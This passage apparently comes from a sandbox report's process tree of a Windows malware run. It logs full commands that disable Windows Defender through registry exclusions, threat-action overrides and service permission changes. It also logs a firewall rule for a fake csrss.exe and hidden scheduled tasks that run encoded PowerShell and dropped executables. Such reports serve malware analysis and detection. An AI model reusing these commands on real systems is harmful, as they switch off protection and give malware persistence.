        
        PID:456
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:2020
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:4336
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gzGyUjocW" /SC once /ST 01:19:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:776
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gzGyUjocW"
        6⤵
        
        PID:2168
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvgvHgqNgKCzXIKVFa" /SC once /ST 20:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\AGODFfW.exe\" Lc /CXsite_idCSv 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:1636
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gzGyUjocW"
        6⤵
        
        PID:552
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe" -Force
  2⤵
  PID:3776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5032 -ip 5032
1⤵
PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5032 -ip 5032
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5032 -ip 5032
1⤵
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5032 -ip 5032
1⤵
PID:776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5032 -ip 5032
1⤵
PID:2356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4704 -ip 4704
1⤵
PID:1936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4704 -ip 4704
1⤵
PID:1612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4704 -ip 4704
1⤵
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4704 -ip 4704
1⤵
PID:1656

C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe
C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2c0,0x2fc,0x6e659558,0x6e659564,0x6e659570
1⤵
PID:1364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4704 -ip 4704
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4704 -ip 4704
1⤵
PID:4040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5032 -ip 5032
1⤵
PID:4388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4704 -ip 4704
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4704 -ip 4704
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5032 -ip 5032
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5032 -ip 5032
1⤵
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4704 -ip 4704
1⤵
PID:1784
- C:\Windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5032 -ip 5032
1⤵
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4704 -ip 4704
1⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5032 -ip 5032
1⤵
PID:1956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4704 -ip 4704
1⤵
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4704 -ip 4704
1⤵
PID:1352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5032 -ip 5032
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4704 -ip 4704
1⤵
PID:1360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4704 -ip 4704
1⤵
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4704 -ip 4704
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4704 -ip 4704
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4704 -ip 4704
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5032 -ip 5032
1⤵
PID:944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4704 -ip 4704
1⤵
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5032 -ip 5032
1⤵
PID:2108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5032 -ip 5032
1⤵
PID:984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5032 -ip 5032
1⤵
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5032 -ip 5032
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4704 -ip 4704
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5032 -ip 5032
1⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4964 -ip 4964
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4256 -ip 4256
1⤵
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4964 -ip 4964
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4964 -ip 4964
1⤵
PID:3760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4964 -ip 4964
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4256 -ip 4256
1⤵
PID:60

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4964 -ip 4964
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4256 -ip 4256
1⤵
PID:1936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4256 -ip 4256
1⤵
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4964 -ip 4964
1⤵
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4256 -ip 4256
1⤵
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4964 -ip 4964
1⤵
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4256 -ip 4256
1⤵
PID:4336
- C:\Windows\SysWOW64\cmd.exe
  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
  2⤵
  PID:4696
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2168
- - \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4256 -ip 4256
1⤵
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4964 -ip 4964
1⤵
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4256 -ip 4256
1⤵
PID:1228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4964 -ip 4964
1⤵
PID:3372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4256 -ip 4256
1⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3c2614,0x3c2620,0x3c262c
1⤵
PID:4128

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4964 -ip 4964
1⤵
PID:336

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
- Modifies Windows Firewall
PID:4988

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
1⤵
PID:5036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1936 -ip 1936
1⤵
PID:3936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1936 -ip 1936
1⤵
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1936 -ip 1936
1⤵
PID:1940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1936 -ip 1936
1⤵
PID:2792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1936 -ip 1936
1⤵
PID:1624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1936 -ip 1936
1⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1936 -ip 1936
1⤵
PID:4472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1936 -ip 1936
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4964 -ip 4964
1⤵
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4964 -ip 4964
1⤵
PID:4536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1936 -ip 1936
1⤵
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1936 -ip 1936
1⤵
PID:4448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1936 -ip 1936
1⤵
PID:720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4732
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1020

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1936 -ip 1936
1⤵
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1936 -ip 1936
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1936 -ip 1936
1⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1936 -ip 1936
1⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
1⤵
PID:3776

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:3428

C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\AGODFfW.exe
C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\STqvVSINdDxWlBS\AGODFfW.exe Lc /CXsite_idCSv 385118 /S
1⤵
PID:1224
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\reg.exe
